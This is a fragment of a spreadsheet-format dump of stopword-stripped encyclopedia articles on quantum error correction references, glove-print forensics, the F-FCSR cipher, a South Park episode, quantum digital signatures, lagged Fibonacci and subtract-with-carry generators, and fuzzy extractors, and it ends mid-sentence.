quantum error correction. cambridge university press. guardia, giuliano gadioli, (2020). quantum error correction: symmetric, asymmetric, synchronizable, convolutional codes. springer nature. frank gaitan (2008). quantum error correction fault tolerant quantum computing. taylor francis.freedman, michael meyer, david luo, feng: z2-systolic freedom quantum codes. mathematics quantum computation, 287–320, comput. math. ser., chapman hall/crc, boca raton, 2002. freedman, michael meyer, david (1998). "projective plane planar quantum codes". found. comput. math. 2001 (3): 325–332. arxiv:quant-ph/9810055. bibcode:1998quant.ph.10055f. lassen, mikael; sabuncu, metin; huck, alexander; niset, julien; leuchs, gerd; cerf, nicolas andersen, ulrik (2010). "quantum optical coherence survive photon losses using continuous-variable quantum erasure-correcting code". nature photonics. (1): bibcode:2010napho...4...10w. doi:10.1038/nphoton.2009.243. external links knill, (2004). "quantum computing very noisy devices". nature. (7029): 39–44. arxiv:quant-ph/0410199. bibcode:2005natur.434...39k. doi:10.1038/nature03350. pmid 15744292. s2cid 4420858. error-check breakthrough quantum computing "topological quantum error correction". quantum light. university sheffield. september 2018. archived original 2021-12-22 youtube.</t>
  </si>
  <si>
    <t>Glove prints</t>
  </si>
  <si>
    <t>glove prints, also sometimes described gloveprints glove marks, latent, fingerprint-like impressions transferred surface object individual wearing gloves. many criminals often wear gloves avoid leaving fingerprints, makes crime investigation difficult. although gloves protective covering wearer's prints, gloves leave prints sometimes unique like human fingerprints, thus betraying wearer. after collecting glove prints, enforcement match gloves collected evidence well glove prints retrieved crime scenes. history since advent fingerprint detection, many criminals resorted wearing gloves commission crimes order avoid leaving fingerprints evidence. prior contemporary advances forensic science, simple covering hands often assured criminal assailants anonymity witnesses present offenses; thus pair gloves became essential crucial tool successful perpetrator.in earlier decades, investigators would dust fingerprints find smears smudges caused gloves. often earlier decades smudges ignored little detail retrievable. with advent latent fingerprint detection late 20th century, investigators started collect, analyze, record prints left crime scenes created wearing gloves. glove prints simple marks caused seams folds fabric glove, complex marks left behind grain texture fabric glove. when gloves collected evidence prints taken compared glove prints taken crime scenes evidence.offenders wear gloves tend hands fingers freely, thus, gloves give false sense protection, leave easily distinguishable glove prints surfaces handle. either fingerprint able pass glove, when, holes glove, finger glove prints appear together, investigators able better distinguish prints made friction ridges prints made gloves. many times also happens criminals also wear gloves tight-fitting relatively short, makes occurrence prints made butt palm wrist (palm prints) common gloves slip, thus exposing areas skin leave prints. also, many times criminals would discard gloves crime scenes hide nearby. today, latent fingerprints (first discovered surfaces fabrics investigators 1930s), well incriminating bacteria also recovered inside discarded gloves.in many jurisdictions wearing gloves committing crime prosecuted inchoate offense.by 1950s, half century frustration wearing gloves assailants, fingerprint experts began studies determine feasible detect compare glove prints found crime scenes.in 1971, metropolitan police service london, england claims first first) convictions based glove print-evidence. glove-prints found broken window later matched gloves suspect.in 2005, german forensic scientist engineer carried various empirical studies glove prints. manufacturing engineer carried basic research manufacturing techniques gloves determine individual functional characteristics glove surfaces. this included purely textile gloves, coated textile gloves (also dotted gloves), well gloves made dipping forms leather artificial leather gloves, together combinations aforementioned surfaces. also developed anatomical effects hand creating glove prints. time, many landeskriminalamt began transfer glove prints databases traces. since 2012, glove prints inherent part education forensic experts bundeskriminalamt (germany) (division forensic science institute).starting early 2009, enforcement derbyshire, east midlands, england began uploading hundreds files collected glove prints criminal database. glove print database help police fight crime glove mark working group derbyshire includes derbyshire police department, home office scientific development branch, nottingham trent university.with belief individual offenders possess preferences specific types gloves (style fabric/material), forensic scientists also used glove print databases create complex computations charts isolate, geographically, "hot spots" prints taken specific types gloves matched similar types crimes. forensic scientists even success matching partial glove prints using databases related software. offenders prefer specific type glove depending perceived inherent benefits. latex, nitrile, plastic, rubber, vinyl gloves worn thin cling wearer's skin turn provides level dexterity wearer. leather gloves possess pores provides wearer enhanced gripping ability. leather gloves thin tight-fitting provide enhanced gripping dexterity wearer. prints different glove types thin, latex, rubber, plastic, vinyl nitrile gloves: these gloves worn criminals tight, thin allows hands remain dexterous. because thinness gloves, fingerprints pass material, thus transferring wearer's prints onto whatever surface touched handled. latent prints also recovered latex, vinyl, nitrile gloves, several methods, cyanoacrylate, ninhydrin, gentian violet, magnetic powder processing leather gloves: these gloves worn criminals tactile properties leather allow good grip dexterity. these properties result grain present surface glove. grain makes surface leather unique glove. over time, pores grain leather gloves pick dirt grease surfaces touched handled. dirt grease return help create prints surfaces. also, unlined gloves provide dexterity time become saturated oils sweat wearer's hands. this helps increase gripping properties gloves causes gloves leave prints. print contains glove wearer's sweat oils contain dna, incriminate them. investigators able dust marks left behind leather dust fingerprints. woolen, cotton, fabric gloves: these gloves worn criminals typically inexpensive readily available well. weave patterns fabric gloves also unique glove collected crime scene, compared gloves taken evidence. like leather gloves, gloves time pick dirt grease well. notable instances 1993, rochester, york enforcement responding reported burglary arrested suspect fleeing burglarized home. person, investigators found yellow rubber glove later found match glove prints found property known stolen home. 2001, cobb county, georgia, enforcement responded break-in burglary under-construction condominium development found glove marks window pushed open perpetrator. enforcement later found perpetrator hiding complex collected items perpetrator hiding him. investigators able match texture weave pattern palms pair construction/work-type gloves perpetrator glove prints found window. 2002, grand rapids, michigan enforcement investigating string burglaries area. fingerprints found latent glove prints found fingerprint powder. particularly detailed hand print leather glove became visible break-in point burglary. after group suspected burglars brought investigators received warrant search vehicle linked suspects. brown leather batting glove recovered seemed match stitch detail glove prints taken break-in point. after scanning palm leather glove recovered glove print computer, investigators used adobe photoshop software compare grain detail glove grain detail glove print. investigators thus able match stitching grain detail both, thus incriminating suspects. 2009, teenager arrested royal oak, michigan obstructing police near location recently reported burglary. while custody investigators compared gloves suspect possession glove prints found several break-in locations. investigators able link marks left window gloves. 2011, maricopa county, arizona sheriff's office began investigating string robberies, dating least 1993, high-end homes vicinity paradise valley, arizona. investigators noted assailant assailants) wore fabric/cloth gardening gloves rubber grips left unique prints many surfaces burglarized locations. upon arresting 58-year-old suspect near home surveillance sheriff's office, authorities found amongst burglary tools possession, gardening gloves matched unique prints found burglarized locations. 2012, enforcement newton county, indiana found unique glove prints home recently burglarized. impressions left gloves seemed possess indentations made letters "m", "e", would present surface gloves. authorities later able match unique impressions mechanix-brand gloves found residence suspect. december 2013 toronto reported royal canadian mounted police seized hundreds firearms found searching homes high river, alberta temporarily deserted 2013 alberta floods. residents firearms seized also found glove marks conspicuous places bedroom furniture, guns thought stored. references further reading police journal: glove print identification technique journal forensic identification: glove print identification german police journal kriminalpolizei: glove print identification part matthias braune german police journal kriminalpolizei: glove print identification part matthias braune rousseau, mélina; ledroit, pierre; malo, marianne; henrot, damien; guille, hélène (september 2020). "fingermarks development gloves: relative efficiency indanedione/zncl2, ninhydrin powder". science justice. (5): 473–479. doi:10.1016/j.scijus.2020.07.002. pmid 32873387. s2cid 221466976.</t>
  </si>
  <si>
    <t>F-FCSR</t>
  </si>
  <si>
    <t>cryptography, f-fcsr stream cipher developed thierry berger, françois arnault, cédric lauradoux. core cipher feedback carry shift register (fcsr) automaton, similar lfsr, perform operations carries transition function nonlinear. f-fcsr eight algorithms selected ecrypt network's estream portfolio, later removed analysis showed weaknesses. references</t>
  </si>
  <si>
    <t>Pseudo bit error ratio</t>
  </si>
  <si>
    <t>pseudo error ratio (pber) adaptive high-frequency (hf) radio, error ratio derived majority decoder processes redundant transmissions. note: adaptive radio automatic link establishment, pber determined extent error correction, using fraction non-unanimous votes 2-of-3 majority decoder. this article incorporates public domain material general services administration document: "federal standard 1037c". support mil-std-188)</t>
  </si>
  <si>
    <t>Skank Hunt</t>
  </si>
  <si>
    <t>"skank hunt" second episode twentieth season american animated television series south park. 269th episode series overall, first aired comedy central united states september 2016. episode satirizes trolling, cyberbullying suicide prevention. plot faculty south park elementary holds parents-only meeting, discussing recent activity internet troll named skankhunt42 harasses people school's student message boards elsewhere internet. parents implored investigate question whether children might troll, unaware skankhunt42 actually gerald broflovski, father students kyle broflovski. student heidi turner becomes depressed deletes twitter profile, throwing phone bridge. entire school devastated, treat situation heidi committed suicide. classmates mackey "funeral" tribute twitter, despite presence among them. later, scott malkinson convinced "end all" deleting twitter account. mackey forced calm down, scott come minutes later complaining thing. this recurs point scott calls mackey middle night. gerald gleefully continues clandestine internet activities. although colleague gerald's victims characterizes skankhunt42 miserable, gerald shown genuinely enjoying day, dancing street, exhibiting extreme tolerance behavior part others. soon discovers internet attacks made news. following attack upon danish breast cancer awareness website, webmaster, danish olympic volleyball gold medalist named freja ollegard, states publicly intimidated skankhunt42. gerald sees challenge happily accepts. convinced skankhunt42 boys, female students conspire take revenge him. boys hold meeting decide problem, think eric cartman. they lure cabin woods, promise slumber party all-night video game-playing. cabin, boys brandish assorted weapons, destroy cartman's electronic devices bury them. skankhunt42's activities continue, boys shocked realize cannot cartman. unaware this, girls confronts respective boyfriend, handing letter stating breaking forever. stan observes throughout school, wendy hands note walking away. denez prigent along lisa gerrard provide closing song "gortoz ran" (sung breton, celtic language) episode mentioned artists closing credits. reception jesse schedeen gave episode noting "much focused enjoyable episode last week's scatter-brained season premiere." jeremy lambert mania gave criticizing "couldn't seem make mind" serious episode internet trolling suicide, lighthearted approach trolling. caffrey a.v. club gave complimenting implementation boston gerald enthusiastically trolls internet. chris longo geek gave stars theorizing cartman still reaping benefits storyline, commenting "he's step closer winning ideological war, even he's longer person pulling strings." references external links "skank hunt" full episode south park studios "skank hunt" imdb</t>
  </si>
  <si>
    <t>Quantum digital signature</t>
  </si>
  <si>
    <t>quantum digital signature (qds) refers quantum mechanical equivalent either classical digital signature generally, handwritten signature paper document. like handwritten signature, digital signature used protect document, digital contract, forgery another party participating parties. e-commerce become important society, need certify origin exchanged information arisen. modern digital signatures enhance security based difficulty solving mathematical problem, finding factors large numbers used algorithm). unfortunately, task solving problems becomes feasible quantum computer available (see shor's algorithm). face problem, quantum digital signature schemes development provide protection tampering, even parties possession quantum computers using powerful quantum cheating strategies. classical public-key method public-key method cryptography allows sender sign message (often cryptographic hash message) sign recipient can, using corresponding public key, check authenticity message. allow this, public made broadly available potential recipients. make sure legal author message validly sign message, public created random, private sign key, using one-way function. this function designed computing result given input easy, computing input given result difficult. classic example multiplication large primes: multiplication easy, factoring product without knowing primes normally considered infeasible. {\displaystyle x\mapsto f(x)} easy {\displaystyle f(x)\mapsto difficult quantum digital signature like classical digital signatures, quantum digital signatures make asymmetric keys. thus, person wants sign message creates pairs sign corresponding public keys. general divide quantum digital signature schemes groups: scheme creates public quantum-bit private classical string: {\displaystyle k\mapsto |f_{k}\rangle scheme creates public quantum-bit private quantum string: {\displaystyle |k\rangle \mapsto |f_{k}\rangle cases one-way quantum function properties classical one-way function. that result easy compute, but, contrast classical scheme, function impossible invert, even uses powerful quantum cheating strategies. famous scheme first method provided gottesman chuang requirements good usable signature scheme most requirements classical digital signature scheme also apply quantum digital signature scheme. detail scheme provide security tampering sender message signed (see commitment) receiver third party creating signed message easy every recipient answer, testing message validity (valid, non-valid) differences classical quantum one-way functions nature one-way function classical one-way function said based classical infeasible mathematical task, whereas quantum one-way function exploits uncertainty principle makes impossible even quantum computer compute inverse. this done providing quantum output state, cannot learn enough input string reproduce case first group schemes shown holevo's theorem, says, given n-qubit quantum state cannot extract classical bits information. possibility ensure scheme uses less qubits string certain length using nearly orthogonal states {\displaystyle |\langle f_{k}|f_{k}'\rangle |&lt;\delta \qquad {\text{ }}k\neq k'\land 0\leq \delta \leq that gives possibility induce basis states. describe information {\displaystyle 2^{n}} bits, less qubits. example qubit basis {\displaystyle |0\rangle {\displaystyle |1\rangle {\displaystyle {\frac {1}{\sqrt {2}}}(|0\rangle +|1\rangle only qubits needed describe classical bits {\displaystyle 3^{m}=2^{n}} holds. because holevo's theorem fact, much smaller bits bits message. more general, gets copies public extract bits private key. {\displaystyle \delta {\displaystyle n-tm} becomes large, makes impossible dishonest person guess sign key. note: cannot distinguish non-orthogonal states, small amount identical states. that's quantum one-way functions works. nevertheless {\displaystyle |f_{k}\rangle leaks information private key, contrast classical public key, forces nothing private key. copying public classical case create classical public classical sign key, thus easy provide every potential recipient copy public key. public freely distributed. this becomes difficult quantum case, copying quantum state forbidden cloning theorem, long state unknown. public keys created distributed person knows exact quantum state wants create, thus knows sign (this sender general trustful institution). nevertheless, contrast classical public upper bound number public quantum keys created, without enabling guess sign thus endangering security scheme {\displaystyle n-tm} big) public every recipient (swap test) make sure every recipient gets identical results testing authenticity message, public keys distributed same. this straightforward classical case, easily compare classical strings match. nevertheless, quantum state complicated. test, public quantum states compare following {\displaystyle |f_{k}'\rangle =|f_{k}\rangle this done following quantum circuit uses fredkin gate hadamard gate ancilla qubit first ancilla qubit symmetric state {\displaystyle |a\rangle ={\frac {1}{\sqrt {2}}}(|0\rangle +|1\rangle right ancilla qubit used control targets {\displaystyle |f_{k}\rangle {\displaystyle |f_{k}'\rangle fredkin gate. furthermore, hadamard gate applied ancilla qubit finally first qubit gets measured. states same, result {\displaystyle |0\rangle measured. states nearly orthogonal, result either {\displaystyle |0\rangle {\displaystyle |1\rangle .the calculation swap test detail: overall state {\displaystyle |\psi _{0}\rangle =|a\rangle |f_{k}\rangle |f_{k}'\rangle {\displaystyle |\psi _{0}\rangle ={\frac {1}{\sqrt {2}}}{\bigg (}|0\rangle +|1\rangle {\bigg )}|f_{k}\rangle |f_{k}'\rangle {\displaystyle |\psi _{0}\rangle ={\frac {1}{\sqrt {2}}}{\bigg (}|0\rangle |f_{k}\rangle |f_{k}'\rangle +|1\rangle |f_{k}\rangle |f_{k}'\rangle {\bigg after fredkin gate applied {\displaystyle \rightarrow {\frac {1}{\sqrt {2}}}{\bigg (}|0\rangle |f_{k}\rangle |f_{k}'\rangle +|1\rangle \mathbf {|f_{k}'\rangle |f_{k}\rangle {\bigg after hadamard gate applied first qubit {\displaystyle \rightarrow {\frac {1}{2}}{\bigg [}{\bigg (}|0\rangle +|1\rangle {\bigg )}|f_{k}\rangle |f_{k}'\rangle +{\bigg (}|0\rangle -|1\rangle {\bigg )}|f_{k}'\rangle |f_{k}\rangle {\bigg after sorting {\displaystyle |0\rangle {\text{ }}|1\rangle {\displaystyle \rightarrow |\psi \rangle ={\frac {1}{2}}{\bigg [}|0\rangle {\bigg (}|f_{k}\rangle |f_{k}'\rangle +|f_{k}'\rangle |f_{k}\rangle {\bigg )}+|1\rangle {\bigg (}|f_{k}\rangle |f_{k}'\rangle -|f_{k}'\rangle |f_{k}\rangle {\bigg )}{\bigg easy see, states {\displaystyle |f_{k}\rangle =|f_{k}'\rangle {\displaystyle |\psi \rangle =|0\rangle |f_{k}\rangle |f_{k}\rangle gives whenever measured. example signing-validation process using simplified gottesman-chuang scheme signing process person (alice) want send message person (bob). hash algorithms considered, alice sign every single message. message-bit {\displaystyle \{0,1\}} alice chooses pairs private keys {\displaystyle \{k_{0}^{i},k_{1}^{i}\}\quad 1\leq i\leq {\displaystyle k_{0}} keys used sign message-bit {\displaystyle k_{1}} keys used sign message-bit 1.the function maps {\displaystyle k\mapsto |f_{k}\rangle known parties. alice computes corresponding public keys {\displaystyle \{|f_{k_{0}}^{i}\rangle ,|f_{k_{1}}^{i}\rangle gives recipients. make many copies needs, take care, endanger security hold {\displaystyle \left(n\gg tm{\text{ hold }}\right)} level security limits number identical public keys create message-bit sends private keys {\displaystyle k_{0}} along message-bit message-bit sends private keys {\displaystyle k_{1}} along message-bit bobremember: example alice picks signs every single message validation process possesses message-bit corresponding private keys {\displaystyle k_{0}{\text{ }}k_{1}} public keys {\displaystyle \{|f_{k_{0}}\rangle ,|f_{k_{1}}\rangle calculates {\displaystyle |f_{k_{b}}\rangle received private keys (either {\displaystyle k_{0}{\text{ }}k_{1}} after done makes swap test compare calculated states received public keys. since swap test probability give wrong answer keys counts many incorrect keys gets obvious, kind security parameter. unlikely validate wrong bigger gets incorrect keys, probably valid, calculated keys public keys seem same. gets many incorrect keys, somebody faked message high probability. avoid message validated differently problem arises especially small number incorrect keys different recipients measure differ probability. define threshold enough, would cause message validated differently, number incorrect keys close defined threshold. this prevented defining threshold. because number errors increase proportional thresholds defined like acceptance {\displaystyle t_{a}=c_{1}m} rejection {\displaystyle t_{r}=c_{2}m} number incorrect keys {\displaystyle t_{a}} valid high probability number incorrect keys {\displaystyle t_{r}} faked high probability number incorrect keys in-between thresholds, recipient cannot sure, another recipient gets outcome, validating bit. furthermore, can't even sure, validated message right.if assume perfect channels without noise, can't changed transfer, threshold {\displaystyle t_{a}} zero, swap test passes always, compared states message authentication message authentication codes (macs) mainly data origin authentication, also provide non-repudiation certain realistic scenarios trusted third party involved. principle, idea exploited framework quantum macs. however, broad class quantum macs seem offer advantage classical counterparts. also lamport signature practical digital signature method invented 1970s believed secure even quantum computing attacks. quantum cryptography quantum fingerprinting references</t>
  </si>
  <si>
    <t>Subtract with carry</t>
  </si>
  <si>
    <t>subtract-with-carry pseudorandom number generator: many algorithms designed produce long series random-looking numbers based small amount starting data. lagged fibonacci type introduced george marsaglia arif zaman 1991. "lagged fibonacci" refers fact random number function preceding numbers specified, fixed offsets, "lags". algorithm sequence generated subtract-with-carry engine described recurrence relation: {\displaystyle x(i)=(x(i-s)-x(i-r)-cy(i-1))\ {\bmod }}m} otherwise {\displaystyle cy(i)={\begin{cases}1,&amp;{\text{if }}x(i-s)-x(i-r)-cy(i-1)&lt;0\\0,&amp;{\text{otherwise}}\end{cases}}} constants known short long lags, respectively. therefore, expressions {\displaystyle x(i-s)} {\displaystyle x(i-r)} correspond s-th r-th previous terms sequence. satisfy condition {\displaystyle 0&lt;s&lt;r} modulus value {\displaystyle m=2^{w}} word size, bits, state sequence {\displaystyle w&gt;0} subtract-with-carry engine family generators includes well add-with-carry subtract-with-borrow engines.it three random number generator engines included standard c++11 library. references</t>
  </si>
  <si>
    <t>Lagged Fibonacci generator</t>
  </si>
  <si>
    <t>lagged fibonacci generator (lfg sometimes lfib) example pseudorandom number generator. this class random number generator aimed improvement 'standard' linear congruential generator. these based generalisation fibonacci sequence. fibonacci sequence described recurrence relation: {\displaystyle s_{n}=s_{n-1}+s_{n-2}} hence, term last terms sequence. this generalised sequence: {\displaystyle s_{n}\equiv s_{n-j}\star s_{n-k}{\pmod {m}},0&lt;j&lt;k} case, term combination previous terms. usually power 2m), often 264. {\displaystyle \star operator denotes general binary operation. this either addition, subtraction, multiplication, bitwise exclusive-or operator (xor). theory type generator rather complex, sufficient simply choose random values these generators also tend sensitive initialisation. generators type employ words state (they 'remember' last values). operation used addition, generator described additive lagged fibonacci generator alfg, multiplication used, multiplicative lagged fibonacci generator mlfg, operation used, called two-tap generalised feedback shift register gfsr. mersenne twister algorithm variation gfsr. gfsr also related linear-feedback shift register, lfsr. properties lagged fibonacci generators lagged fibonacci generators maximum period 1)×2m-1 addition subtraction used, exclusive-or operations used combine previous values. hand, multiplication used, maximum period 2m−3, period additive case. generator achieve maximum period, polynomial: 1must primitive integers values satisfying constraint published literature. another list possible values page volume computer programming: (24, 55), (38, 89), (37, 100), (30, 127), (83, 258), (107, 378), (273, 607), (1029, 2281), (576, 3217), (4187, 9689), (7083, 19937), (9739, 23209)note smaller number short periods (only "random" numbers generated first "random" number repeated sequence restarts). addition used, required least first values chosen initialise generator odd; multiplication used, instead, required first values odd.it suggested good ratios approximately golden ratio. problems lfgs paper four-tap shift registers, robert ziff, referring lfgs operator, states widely known generators, particular two-tap rules r(103, 250), serious deficiencies. marsaglia observed poor behavior r(24, smaller generators, advised using generators type altogether. basic problem two-tap generators r(a, built-in three-point correlation {\displaystyle x_{n}} {\displaystyle x_{n-a}} {\displaystyle x_{n-b}} simply given generator while correlations spread size {\displaystyle p=max(a,b,c,\ldots generator itself, evidently still lead significant errors.". this refers standard number sequence depends previous numbers. three-tap shown eliminate statistical problems failing birthday spacings generalized triple tests.the initialization lfgs complex problem. output lfgs sensitive initial conditions, statistical defects appear initially also periodically output sequence unless extreme care taken. another potential problem lfgs mathematical theory behind incomplete, making necessary rely statistical tests rather theoretical performance. usage freeciv uses lagged fibonacci generator random number generator. boost library includes implementation lagged fibonacci generator. subtract carry, lagged fibonacci generator engine, included c++11 library. oracle database implements generator dbms_random package (available oracle newer versions). also wikipedia page 'list random number generators' lists prngs including better statistical qualitites: linear congruential generator acorn generator mersenne twister xoroshiro128+ fish (cipher) pike cipher references toward universal random number generator, g.marsaglia, a.zaman</t>
  </si>
  <si>
    <t>Safe prime</t>
  </si>
  <si>
    <t>Fuzzy extractor</t>
  </si>
  <si>
    <t>fuzzy extractors method allows biometric data used inputs standard cryptographic techniques, enhance computer security. "fuzzy", context, refers fact fixed values required cryptography extracted values close identical original key, without compromising security required. application encrypt authenticate users records, using biometric inputs user key. fuzzy extractors biometric tool allows user authentication, using biometric template constructed user's biometric data key, extracting uniform random string {\displaystyle input {\displaystyle tolerance noise. input changes {\displaystyle still close {\displaystyle string {\displaystyle re-constructed. achieve this, initial computation {\displaystyle process also outputs helper string {\displaystyle stored recover {\displaystyle later made public without compromising security {\displaystyle security process also ensured adversary modifies {\displaystyle once fixed string {\displaystyle calculated, used, example, agreement user server based biometric input. history precursor fuzzy extractors so-called "fuzzy commitment", designed juels wattenberg. here, cryptographic decommited using biometric data. later, juels sudan came fuzzy vault schemes. these order invariant fuzzy commitment scheme reed–solomon error correction code. code word inserted coefficients polynomial, polynomial evaluated respect various properties biometric data. both fuzzy commitment fuzzy vaults precursors fuzzy extractors. motivation order fuzzy extractors generate strong keys biometric noisy data, cryptography paradigms applied biometric data. these paradigms: limit number assumptions content biometric data (this data comes variety sources; order avoid exploitation adversary, best assume input unpredictable). apply usual cryptographic techniques input. (fuzzy extractors convert biometric data secret, uniformly random, reliably reproducible random strings.) these techniques also broader applications type noisy inputs approximative data human memory, images used passwords, keys quantum channels. fuzzy extractors also applications proof impossibility strong notions privacy regard statistical databases. basic definitions predictability predictability indicates probability adversary guess secret key. mathematically speaking, predictability random variable {\displaystyle {\displaystyle \max _{\mathrm }p[a=a]} example, given pair random variable {\displaystyle {\displaystyle adversary knows {\displaystyle {\displaystyle predictability {\displaystyle {\displaystyle \max _{\mathrm }p[a=a|b=b]} adversary predict {\displaystyle {\displaystyle e_{b\leftarrow b}[\max _{\mathrm }p[a=a|b=b]]} average {\displaystyle adversary control, since knowing {\displaystyle makes prediction {\displaystyle adversarial, take worst case {\displaystyle min-entropy min-entropy indicates worst-case entropy. mathematically speaking, defined {\displaystyle h_{\infty }(a)=-\log(\max _{\mathrm }p[a=a])} random variable min-entropy least {\displaystyle called {\displaystyle -source. statistical distance statistical distance measure distinguishability. mathematically speaking, expressed probability distributions {\displaystyle {\displaystyle {\displaystyle sd[a,b]} {\displaystyle {\frac {1}{2}}\sum _{\mathrm }|p[a=v]-p[b=v]|} system, {\displaystyle replaced {\displaystyle behave original system probability least {\displaystyle 1-sd[a,b]} definition (strong extractor) setting {\displaystyle strong randomness extractor. randomized function ext: {\displaystyle m\rightarrow \{0,1\}^{l}} randomness length {\displaystyle {\displaystyle (m,l,\epsilon strong extractor {\displaystyle -sources {\displaystyle {\displaystyle m(\operatorname {ext} (w;i),i)\approx _{\epsilon }(u_{l},u_{r}),} {\displaystyle i=u_{r}} independent {\displaystyle output extractor generated {\displaystyle w\leftarrow seed {\displaystyle i\leftarrow behaves independently parts system, probability {\displaystyle 1-\epsilon strong extractors extract {\displaystyle l=m-2\log {\frac {1}{\epsilon }}+o(1)} bits arbitrary {\displaystyle -source. secure sketch secure sketch makes possible reconstruct noisy input; that, input {\displaystyle sketch {\displaystyle given {\displaystyle value {\displaystyle close {\displaystyle {\displaystyle recovered. sketch {\displaystyle must reveal information {\displaystyle order keep secure. {\displaystyle \mathbb metric space, secure sketch recovers point {\displaystyle w\in \mathbb point {\displaystyle w'\in \mathbb close {\displaystyle without disclosing {\displaystyle itself. definition (secure sketch) {\displaystyle (m,{\tilde {m}},t)} secure sketch pair efficient randomized procedures sketch; recover) that: sketching procedure takes input {\displaystyle w\in \mathbb returns string {\displaystyle s\in {\{0,1\}^{*}}} recovery procedure takes input elements {\displaystyle w'\in \mathbb {\displaystyle s\in {\{0,1\}^{*}}} .(2) correctness: {\displaystyle dis(w,w')\leq {\displaystyle rec(w',ss(w))=w} security: {\displaystyle -source {\displaystyle min-entropy {\displaystyle given {\displaystyle high: {\displaystyle (w,e)} {\displaystyle {\tilde {h}}_{\mathrm {\infty }(w|e)\geq {\displaystyle {\tilde {h}}_{\mathrm {\infty }(w|ss(w),e)\geq {\tilde {m}}} fuzzy extractor fuzzy extractors recover original input generate string {\displaystyle (which close uniform) {\displaystyle allow subsequent reproduction (using helper string {\displaystyle given {\displaystyle close {\displaystyle strong extractors special case fuzzy extractors {\displaystyle {\displaystyle p=i} definition (fuzzy extractor) {\displaystyle (m,l,t,\epsilon fuzzy extractor pair efficient randomized procedures (gen generate reproduce) that: gen, given {\displaystyle w\in \mathbb outputs extracted string {\displaystyle r\in {\mathbb {\{} 0,1\}^{l}}} helper string {\displaystyle p\in {\mathbb {\{} 0,1\}^{*}}} correctness: {\displaystyle dis(w,w')\leq {\displaystyle (r,p)\leftarrow gen(w)} {\displaystyle rep(w',p)=r} security: m-sources {\displaystyle {\displaystyle string {\displaystyle nearly uniform, even given {\displaystyle {\displaystyle {\tilde {h}}_{\mathrm {\infty }(w|e)\geq {\displaystyle (r,p,e)\approx (u_{\mathrm },p,e)} fuzzy extractors output almost uniform random sequences bits prerequisite using cryptographic applications secret keys). since output bits slightly non-uniform, there's risk decreased security; distance uniform distribution {\displaystyle \epsilon long distance sufficiently small, security remain adequate. secure sketches fuzzy extractors secure sketches used construct fuzzy extractors: example, applying {\displaystyle obtain {\displaystyle strong extractor ext, randomness {\displaystyle {\displaystyle {\displaystyle {\displaystyle (s,x)} stored helper string {\displaystyle {\displaystyle reproduced {\displaystyle {\displaystyle p=(s,x)} {\displaystyle rec(w',s)} recover {\displaystyle {\displaystyle ext(w,x)} reproduce {\displaystyle following lemma formalizes this. lemma (fuzzy extractors sketches) assume (ss,rec) {\displaystyle (m,m,{\tilde {m}},t)} secure sketch average-case {\displaystyle (n,{\tilde {m}},l,\epsilon strong extractor. then following (gen, rep) {\displaystyle (m,m,l,t,\epsilon fuzzy extractor: {\displaystyle (w,r,x)} {\displaystyle p=(ss(w;r),x),r=ext(w;x),} output {\displaystyle (r,p)} {\displaystyle (w',(s,x))} recover {\displaystyle w=rec(w',s)} output {\displaystyle r=ext(w;x)} proof: definition secure sketch (definition {\displaystyle h_{\infty }(w|ss(w))\geq {\tilde {m}}} ;and since average-case {\displaystyle (n,m,l,\epsilon -strong extractor; {\displaystyle sd((ext(w;x),ss(w),x),(u_{l},ss(w),x))=sd((r,p),(u_{l},p))\leq \epsilon corollary (ss,rec) {\displaystyle (m,m,{\tilde {m}},t)} secure sketch {\displaystyle (n,{\tilde {m}}-log({\frac {1}{\delta }}),l,\epsilon strong extractor, construction (gen, rep) {\displaystyle (m,m,l,t,\epsilon +\delta fuzzy extractor. cited paper includes many generic combinatorial bounds secure sketches fuzzy extractors. basic constructions error-tolerant properties, secure sketches treated, analyzed, constructed like {\displaystyle (n,k,d)_{\mathcal {f}}} general error-correcting code {\displaystyle [n,k,d]_{\mathcal {f}}} linear codes, {\displaystyle length codewords, {\displaystyle length message coded, {\displaystyle distance codewords, {\displaystyle {\mathcal {f}}} alphabet. {\displaystyle {\mathcal {f}}^{n}} universe possible words possible find error correcting code {\displaystyle c\subset {\mathcal {f}}^{n}} exists unique codeword {\displaystyle c\in every {\displaystyle w\in {\mathcal {f}}^{n}} hamming distance {\displaystyle dis_{ham}(c,w)\leq (d-1)/2} first step constructing secure sketch determining type errors likely occur choosing distance measure. hamming distance constructions when risk data deleted corrupted, best measurement error correction hamming distance. there common constructions correcting hamming errors, depending whether code linear not. both constructions start error-correcting code distance {\displaystyle 2t+1} {\displaystyle {t}} number tolerated errors. code-offset construction when using {\displaystyle (n,k,2t+1)_{\mathcal {f}}} general code, assign uniformly random codeword {\displaystyle c\in {\displaystyle {\displaystyle ss(w)=s=w-c} shift needed change {\displaystyle {\displaystyle errors {\displaystyle subtract {\displaystyle {\displaystyle correct errors resulting incorrect codeword {\displaystyle finally {\displaystyle {\displaystyle {\displaystyle this means {\displaystyle rec(w',s)=s+dec(w'-s)=w} this construction achieve best possible tradeoff error tolerance entropy loss {\displaystyle {\mathcal {f}}\geq reed–solomon code used, resulting entropy loss {\displaystyle 2t\log({\mathcal {f}})} improve upon result would find code better reed–solomon. syndrome construction when using {\displaystyle [n,k,2t+1]_{\mathcal {f}}} linear code, {\displaystyle ss(w)=s} syndrome {\displaystyle correct {\displaystyle find vector {\displaystyle {\displaystyle syn(e)=syn(w')-s} {\displaystyle w=w'-e} difference constructions when working large alphabet long strings resulting large universe {\displaystyle {\mathcal {u}}} efficient treat {\displaystyle {\displaystyle sets look differences correct errors. work large {\displaystyle useful look characteristic vector {\displaystyle x_{w}} binary vector length {\displaystyle value element {\displaystyle a\in {\mathcal {u}}} {\displaystyle a\in {\displaystyle a\notin best decrease size secure sketch {\displaystyle large make {\displaystyle large, since size determined {\displaystyle n-k} good code base construction {\displaystyle [n,n-t\alpha ,2t+1]_{2}} code, {\displaystyle n=2^{\alpha }-1} {\displaystyle t\ll {\displaystyle k\leq n-log{n \choose {t}}} useful codes decoded sub-linear time. sketch construction {\displaystyle ss(w)=s=syn(x_{w})} correct {\displaystyle first find {\displaystyle ss(w')=s'=syn(x_{w}')} find {\displaystyle syn(x_{v})=s'-s} finally compute symmetric difference, {\displaystyle rec(w',s)=w'\triangle v=w} while construction used difference, easiest one. edit distance constructions when data corrupted deleted, best measurement edit distance. make construction based edit distance, easiest start construction difference hamming distance intermediate correction step, build edit distance construction around that. other distance measure constructions there many types errors distances used model situations. most possible constructions built upon simpler constructions, edit-distance constructions. improving error tolerance relaxed notions correctness shown error tolerance secure sketch improved applying probabilistic method error correction high probability success. this allows potential code words 